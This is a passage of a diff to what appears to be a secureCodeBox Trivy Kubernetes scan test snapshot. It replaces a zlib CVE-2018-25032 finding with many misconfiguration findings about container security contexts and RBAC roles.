avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-kvmnm", + "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", + "name": "Runs with low group ID(Container 'lurker' of Job 'scan-trivy-k8s-kvmnm' should set 'securityContext.runAsGroup' > 10000)", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/misconfig/ksv021", + }, + { + "type": "URL", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Job/scan-trivy-k8s-kvmnm' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV021", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv021", + ], + }, + "category": "Misconfiguration", + "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-kvmnm", + "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", + "name": "Runs with low group ID(Container 'trivy' of Job 'scan-trivy-k8s-kvmnm' should set 'securityContext.runAsGroup' > 10000)", + "references": [ { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5570-2", + "value": "https://avd.aquasec.com/misconfig/ksv021", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5573-1", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Job/scan-trivy-k8s-kvmnm' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV030", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv030", + ], + }, + "category": "Misconfiguration", + "description": "The RuntimeDefault/Localhost seccomp profile must be required, or allow specific additional profiles.", + "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-kvmnm", + "mitigation": "Set 'spec.securityContext.seccompProfile.type', 'spec.containers[*].securityContext.seccompProfile' and 'spec.initContainers[*].securityContext.seccompProfile' to 'RuntimeDefault' or undefined.", + "name": "Default Seccomp profile not set(Either Pod or Container should set 'securityContext.seccompProfile.type' to 'RuntimeDefault')", + "references": [ { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-37434", + "value": "https://avd.aquasec.com/misconfig/ksv030", }, { "type": "URL", - "value": "https://www.debian.org/security/2022/dsa-5218", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "1:1.2.11.dfsg-1+deb10u1", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-25032", - "installedVersion": "1:1.2.11.dfsg-1", - "packageName": "zlib1g", + "fixedVersion": undefined, + "foundIn": "Target: 'Job/scan-trivy-k8s-kvmnm' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV030", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "http://seclists.org/fulldisclosure/2022/May/33", - "http://seclists.org/fulldisclosure/2022/May/35", - "http://seclists.org/fulldisclosure/2022/May/38", - "http://www.openwall.com/lists/oss-security/2022/03/25/2", - "http://www.openwall.com/lists/oss-security/2022/03/26/1", - "https://access.redhat.com/errata/RHSA-2022:8420", - "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-25032.json", - "https://access.redhat.com/security/cve/CVE-2018-25032", - "https://bugzilla.redhat.com/2067945", - "https://cert-portal.siemens.com/productcert/pdf/ssa-333517.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-25032", - "https://errata.almalinux.org/9/ALSA-2022-8420.html", - "https://github.com/madler/zlib/commit/5c44459c3b28a9bd3283aaceab7c615f8020c531", - "https://github.com/madler/zlib/compare/v1.2.11...v1.2.12", - "https://github.com/madler/zlib/issues/605", - "https://github.com/sparklemotion/nokogiri/releases/tag/v1.13.4", - "https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-v6gp-9mmm-c6p5", - "https://groups.google.com/g/ruby-security-ann/c/vX7qSjsvWis/m/TJWN4oOKBwAJ", - "https://linux.oracle.com/cve/CVE-2018-25032.html", - "https://linux.oracle.com/errata/ELSA-2022-9565.html", - "https://lists.debian.org/debian-lts-announce/2022/04/msg00000.html", - "https://lists.debian.org/debian-lts-announce/2022/05/msg00008.html", - "https://lists.debian.org/debian-lts-announce/2022/09/msg00023.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DCZFIJBJTZ7CL5QXBFKTQ22Q26VINRUF/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DF62MVMH3QUGMBDCB3DY2ERQ6EBHTADB/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JZZPTWRYQULAOL3AW7RZJNVZ2UONXCV4/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NS2D2GFPFGOJUL4WQ3DUAY7HF4VWQ77F/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VOKNP2L734AEL47NRYGVZIKEFOUBQY5Y/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XOKFMSNQ5D5WGMALBNBXU3GE442V74WU/", - "https://nvd.nist.gov/vuln/detail/CVE-2018-25032", - "https://security.gentoo.org/glsa/202210-42", - "https://security.netapp.com/advisory/ntap-20220526-0009/", - "https://security.netapp.com/advisory/ntap-20220729-0004/", - "https://support.apple.com/kb/HT213255", - "https://support.apple.com/kb/HT213256", - "https://support.apple.com/kb/HT213257", - "https://ubuntu.com/security/notices/USN-5355-1", - "https://ubuntu.com/security/notices/USN-5355-2", - "https://ubuntu.com/security/notices/USN-5359-1", - "https://ubuntu.com/security/notices/USN-5359-2", - "https://ubuntu.com/security/notices/USN-5739-1", - "https://www.cve.org/CVERecord?id=CVE-2018-25032", - "https://www.debian.org/security/2022/dsa-5111", - "https://www.openwall.com/lists/oss-security/2022/03/24/1", - "https://www.openwall.com/lists/oss-security/2022/03/28/1", - "https://www.openwall.com/lists/oss-security/2022/03/28/3", - "https://www.oracle.com/security-alerts/cpujul2022.html", + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv030", ], }, - "category": "Vulnerability", - "description": "zlib before 1.2.12 allows memory corruption when deflating (i.e., when compressing) if the input has many distant matches.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "A flaw found in zlib when compressing (not decompressing) certain inputs", + "category": "Misconfiguration", + "description": "The RuntimeDefault/Localhost seccomp profile must be required, or allow specific additional profiles.", + "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-kvmnm", + "mitigation": "Set 'spec.securityContext.seccompProfile.type', 'spec.containers[*].securityContext.seccompProfile' and 'spec.initContainers[*].securityContext.seccompProfile' to 'RuntimeDefault' or undefined.", + "name": "Default Seccomp profile not set(Either Pod or Container should set 'securityContext.seccompProfile.type' to 'RuntimeDefault')", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-25032", - }, - { - "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/May/33", + "value": "https://avd.aquasec.com/misconfig/ksv030", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/May/35", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Job/scan-trivy-k8s-kvmnm' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV106", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv106", + ], + }, + "category": "Misconfiguration", + "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", + "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-kvmnm", + "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", + "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", + "references": [ { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/May/38", + "value": "https://avd.aquasec.com/misconfig/ksv106", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2022/03/25/2", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Job/scan-trivy-k8s-kvmnm' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV106", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv106", + ], + }, + "category": "Misconfiguration", + "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", + "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-kvmnm", + "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", + "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", + "references": [ { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2022/03/26/1", + "value": "https://avd.aquasec.com/misconfig/ksv106", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8420", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ConfigMap/extension-apiserver-authentication' / Class: 'config' / Type: 'kubernetes'", + "id": "AVD-KSV-0110", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://avd.aquasec.com/misconfig/avd-ksv-0110", + ], + }, + "category": "Misconfiguration", + "description": "Storing sensitive content such as usernames and email addresses in configMaps is unsafe", + "location": "scb://trivy/?Namespace=kube-system&Kind=ConfigMap&Name=extension-apiserver-authentication", + "mitigation": "Remove sensitive content from configMap data value", + "name": "ConfigMap with sensitive content(ConfigMap 'extension-apiserver-authentication' in 'kube-system' namespace stores sensitive contents in key(s) or value(s) '{"requestheader-username-headers"}')", + "references": [ { "type": "URL", - "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-25032.json", + "value": "https://avd.aquasec.com/misconfig/avd-ksv-0110", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Role/system:controller:bootstrap-signer' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV049", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv049", + ], + }, + "category": "Misconfiguration", + "description": "Some workloads leverage configmaps to store sensitive data or configuration parameters that affect runtime behavior that can be modified by an attacker or combined with another issue to potentially lead to compromise.", + "location": "scb://trivy/?Namespace=kube-public&Kind=Role&Name=system:controller:bootstrap-signer", + "mitigation": "Remove write permission verbs for resource 'configmaps'", + "name": "Do not allow management of configmaps(Role 'system:controller:bootstrap-signer' should not have access to resource 'configmaps' for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", + "references": [ { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-25032", + "value": "https://avd.aquasec.com/misconfig/ksv049", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2067945", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Role/system::leader-locking-kube-controller-manager' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV049", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv049", + ], + }, + "category": "Misconfiguration", + "description": "Some workloads leverage configmaps to store sensitive data or configuration parameters that affect runtime behavior that can be modified by an attacker or combined with another issue to potentially lead to compromise.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Role&Name=system::leader-locking-kube-controller-manager", + "mitigation": "Remove write permission verbs for resource 'configmaps'", + "name": "Do not allow management of configmaps(Role 'system::leader-locking-kube-controller-manager' should not have access to resource 'configmaps' for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", + "references": [ { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-333517.pdf", + "value": "https://avd.aquasec.com/misconfig/ksv049", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-25032", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Role/system::leader-locking-kube-scheduler' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV049", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv049", + ], + }, + "category": "Misconfiguration", + "description": "Some workloads leverage configmaps to store sensitive data or configuration parameters that affect runtime behavior that can be modified by an attacker or combined with another issue to potentially lead to compromise.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Role&Name=system::leader-locking-kube-scheduler", + "mitigation": "Remove write permission verbs for resource 'configmaps'", + "name": "Do not allow management of configmaps(Role 'system::leader-locking-kube-scheduler' should not have access to resource 'configmaps' for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", + "references": [ { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8420.html", + "value": "https://avd.aquasec.com/misconfig/ksv049", }, { "type": "URL", - "value": "https://github.com/madler/zlib/commit/5c44459c3b28a9bd3283aaceab7c615f8020c531", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Role/system:controller:cloud-provider' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV049", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv049", + ], + }, + "category": "Misconfiguration", + "description": "Some workloads leverage configmaps to store sensitive data or configuration parameters that affect runtime behavior that can be modified by an attacker or combined with another issue to potentially lead to compromise.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Role&Name=system:controller:cloud-provider", + "mitigation": "Remove write permission verbs for resource 'configmaps'", + "name": "Do not allow management of configmaps(Role 'system:controller:cloud-provider' should not have access to resource 'configmaps' for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", + "references": [ { "type": "URL", - "value": "https://github.com/madler/zlib/compare/v1.2.11...v1.2.12", + "value": "https://avd.aquasec.com/misconfig/ksv049", }, { "type": "URL", - "value": "https://github.com/madler/zlib/issues/605", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Role/system:controller:bootstrap-signer' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV041", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv041", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits managing secrets", + "location": "scb://trivy/?Namespace=kube-system&Kind=Role&Name=system:controller:bootstrap-signer", + "mitigation": "Create a role which does not permit to manage secrets if not needed", + "name": "Do not allow management of secrets(Role permits management of secret(s))", + "references": [ { "type": "URL", - "value": "https://github.com/sparklemotion/nokogiri/releases/tag/v1.13.4", + "value": "https://avd.aquasec.com/misconfig/ksv041", }, { "type": "URL", - "value": "https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-v6gp-9mmm-c6p5", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Role/leader-election-role' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV049", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv049", + ], + }, + "category": "Misconfiguration", + "description": "Some workloads leverage configmaps to store sensitive data or configuration parameters that affect runtime behavior that can be modified by an attacker or combined with another issue to potentially lead to compromise.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Role&Name=leader-election-role", + "mitigation": "Remove write permission verbs for resource 'configmaps'", + "name": "Do not allow management of configmaps(Role 'leader-election-role' should not have access to resource 'configmaps' for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", + "references": [ { "type": "URL", - "value": "https://groups.google.com/g/ruby-security-ann/c/vX7qSjsvWis/m/TJWN4oOKBwAJ", + "value": "https://avd.aquasec.com/misconfig/ksv049", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2018-25032.html", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Role/system:controller:token-cleaner' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV041", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv041", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits managing secrets", + "location": "scb://trivy/?Namespace=kube-system&Kind=Role&Name=system:controller:token-cleaner", + "mitigation": "Create a role which does not permit to manage secrets if not needed", + "name": "Do not allow management of secrets(Role permits management of secret(s))", + "references": [ { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9565.html", + "value": "https://avd.aquasec.com/misconfig/ksv041", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/04/msg00000.html", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/cluster-admin' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV044", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv044", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits wildcard verb on wildcard resource", + "location": "scb://trivy/?Kind=ClusterRole&Name=cluster-admin", + "mitigation": "Create a role which does not permit wildcard verb on wildcard resource", + "name": "No wildcard verb and resource roles(Role permits wildcard verb on wildcard resource)", + "references": [ { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/05/msg00008.html", + "value": "https://avd.aquasec.com/misconfig/ksv044", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/09/msg00023.html", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/cluster-admin' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV046", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv046", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits specific verb on wildcard resources", + "location": "scb://trivy/?Kind=ClusterRole&Name=cluster-admin", + "mitigation": "Create a role which does not permit specific verb on wildcard resources", + "name": "No wildcard resource roles(Role permits specific verb on wildcard resource)", + "references": [ { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DCZFIJBJTZ7CL5QXBFKTQ22Q26VINRUF/", + "value": "https://avd.aquasec.com/misconfig/ksv046", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DF62MVMH3QUGMBDCB3DY2ERQ6EBHTADB/", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV041", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv041", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits managing secrets", + "location": "scb://trivy/?Kind=ClusterRole&Name=admin", + "mitigation": "Create a role which does not permit to manage secrets if not needed", + "name": "Do not allow management of secrets(Role permits management of secret(s))", + "references": [ { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JZZPTWRYQULAOL3AW7RZJNVZ2UONXCV4/", + "value": "https://avd.aquasec.com/misconfig/ksv041", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NS2D2GFPFGOJUL4WQ3DUAY7HF4VWQ77F/", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV041", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv041", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits managing secrets", + "location": "scb://trivy/?Kind=ClusterRole&Name=admin", + "mitigation": "Create a role which does not permit to manage secrets if not needed", + "name": "Do not allow management of secrets(Role permits management of secret(s))", + "references": [ { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VOKNP2L734AEL47NRYGVZIKEFOUBQY5Y/", + "value": "https://avd.aquasec.com/misconfig/ksv041", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XOKFMSNQ5D5WGMALBNBXU3GE442V74WU/", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV048", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv048", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits update/create of a malicious pod", + "location": "scb://trivy/?Kind=ClusterRole&Name=admin", + "mitigation": "Create a role which does not permit update/create of a malicious pod", + "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", + "references": [ { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-25032", + "value": "https://avd.aquasec.com/misconfig/ksv048", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-42", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV048", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv048", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits update/create of a malicious pod", + "location": "scb://trivy/?Kind=ClusterRole&Name=admin", + "mitigation": "Create a role which does not permit update/create of a malicious pod", + "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", + "references": [ { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220526-0009/", + "value": "https://avd.aquasec.com/misconfig/ksv048", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220729-0004/", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV048", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv048", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits update/create of a malicious pod", + "location": "scb://trivy/?Kind=ClusterRole&Name=admin", + "mitigation": "Create a role which does not permit update/create of a malicious pod", + "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", + "references": [ { "type": "URL", - "value": "https://support.apple.com/kb/HT213255", + "value": "https://avd.aquasec.com/misconfig/ksv048", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213256", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV048", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv048", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits update/create of a malicious pod", + "location": "scb://trivy/?Kind=ClusterRole&Name=admin", + "mitigation": "Create a role which does not permit update/create of a malicious pod", + "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", + "references": [ { "type": "URL", - "value": "https://support.apple.com/kb/HT213257", + "value": "https://avd.aquasec.com/misconfig/ksv048", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5355-1", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV049", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv049", + ], + }, + "category": "Misconfiguration", + "description": "Some workloads leverage configmaps to store sensitive data or configuration parameters that affect runtime behavior that can be modified by an attacker or combined with another issue to potentially lead to compromise.", + "location": "scb://trivy/?Kind=ClusterRole&Name=admin", + "mitigation": "Remove write permission verbs for resource 'configmaps'", + "name": "Do not allow management of configmaps(ClusterRole 'admin' should not have access to resource 'configmaps' for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", + "references": [ { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5355-2", + "value": "https://avd.aquasec.com/misconfig/ksv049", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5359-1", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV050", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv050", + ], + }, + "category": "Misconfiguration", + "description": "An effective level of access equivalent to cluster-admin should not be provided.", + "location": "scb://trivy/?Kind=ClusterRole&Name=admin", + "mitigation": "Remove write permission verbs for resource 'roles' and 'rolebindings'", + "name": "Do not allow management of RBAC resources(ClusterRole 'admin' should not have access to resources ["roles", "rolebindings"] for verbs ["create", "update", "delete", "deletecollection", "impersonate", "*"])", + "references": [ { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5359-2", + "value": "https://avd.aquasec.com/misconfig/ksv050", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5739-1", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV056", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv056", + ], + }, + "category": "Misconfiguration", + "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", + "location": "scb://trivy/?Kind=ClusterRole&Name=admin", + "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", + "name": "Do not allow management of networking resources(ClusterRole 'admin' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", + "references": [ { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-25032", + "value": "https://avd.aquasec.com/misconfig/ksv056", }, { "type": "URL", - "value": 